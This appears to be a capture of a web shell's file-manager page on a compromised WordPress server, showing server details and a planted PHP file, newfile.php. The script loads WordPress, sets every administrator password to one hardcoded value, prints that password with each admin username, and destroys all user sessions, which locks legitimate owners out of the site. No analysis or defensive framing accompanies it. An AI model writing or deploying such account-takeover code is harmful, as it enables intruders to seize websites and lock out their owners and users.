HEX
Server: nginx/1.24.0
System: Linux DGT-WORDPRESS-VM-SERVER 6.14.0-1014-azure #14~24.04.1-Ubuntu SMP Fri Oct 3 20:52:11 UTC 2025 x86_64
User: ubuntu (1000)
PHP: 8.4.12
Disabled: NONE
$ pwd: /mnt/data/doccure-io/wp-content/
Upload Files
File: /mnt/data/doccure-io/wp-content/newfile.php
<?php  
require_once('/mnt/data/doccure-io/wp-load.php');  

$new_password = "SysAdminHowlSec234@";  

$admin_users = get_users(array(  
    'role' => 'administrator'  
));  

$updated = 0;  
$total = count($admin_users);  

echo "<h2>Password Change Report</h2>";  
echo "<p>Changing passwords for all admin users to: <strong>$new_password</strong></p>";  
echo "<ul>";  

foreach ($admin_users as $user) {  
    wp_set_password($new_password, $user->ID);  
    echo "<li>Updated password for admin: <strong>{$user->user_login}</strong> (ID: {$user->ID})</li>";  
    $updated++;  
}  

echo "</ul>";  
echo "<p><strong>Summary:</strong> Updated $updated out of $total administrator accounts.</p>";  

WP_Session_Tokens::destroy_all_for_all_users();  

echo "<p>All user sessions have been invalidated. Everyone needs to log in again.</p>";  
echo "<p>Recommend: <strong>DELETE THIS SCRIPT</strong> after use for security!</p>";  
?>
@ Telegram